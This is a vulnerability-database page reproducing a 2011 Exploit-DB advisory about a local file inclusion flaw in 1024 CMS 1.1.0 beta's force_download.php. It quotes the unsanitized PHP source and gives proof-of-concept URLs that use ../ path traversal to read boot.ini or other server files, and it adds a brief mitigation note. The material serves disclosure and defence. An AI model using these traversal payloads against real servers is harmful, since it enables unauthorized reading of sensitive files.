header-logo
Suggest Exploit
vendor:
1024 CMS
by:
Sangyun YOO
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: 1024 CMS
Affected Version From: 1024 CMS Version 1.1.0 beta
Affected Version To: 1024 CMS Version 1.1.0 beta
Patch Exists: NO
Related CWE: N/A
CPE: 1024cms:1024_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Starter K
2011

1024 CMS Version 1.1.0 beta(/complete-modules/modules/forcedownload/force_download.php) Local File Inclusion Vulnerability

1024 CMS Version 1.1.0 beta is vulnerable to a Local File Inclusion vulnerability due to a lack of proper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious filename parameter to the vulnerable application. This can allow an attacker to read sensitive files from the server, such as the boot.ini file.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, access to sensitive files should be restricted to only authorized users.
Source

Exploit-DB raw data:

 
# Exploit Title: [1024 CMS Version 1.1.0 beta(/complete-modules/modules/forcedownload/force_download.php) Local File Inclusion Vulnerability]
# Date: [2011/10/19]
# Author: [Sangyun YOO][I2SEC]
# Email: yoosy0302 at naver dot com
# Software Link: [http://1024cms.org/]
# Version: [1024 CMS Version 1.1.0 beta]
# Tested on: [Windows 7 Starter K]
 
---------------------------------------
 
source of force_download.php:
1: <?php
2 include(dirname(__FILE__)."/cls_forcedl.php");
3: $filename = $_GET['filename']; <----------------- LFI
4: $forcedl = new forcedownload();
5: $forcedl->dlfile($filename);
6: exit();
6: ?>
 
---------------------------------------
 
proof of concept:
http://[attacked_box]/[1024cms v1.1.0 beta]/complete-modules/modules/forcedownload/force_download.php?filename=../../../../../../../../boot.ini
 
http://[attacked_box]/[1024cms v1.1.0 beta]/complete-modules/modules/forcedownload/force_download.php?filename=../../../../../../../../[localfile]

Navigation

Suggest Exploit

Services By CQR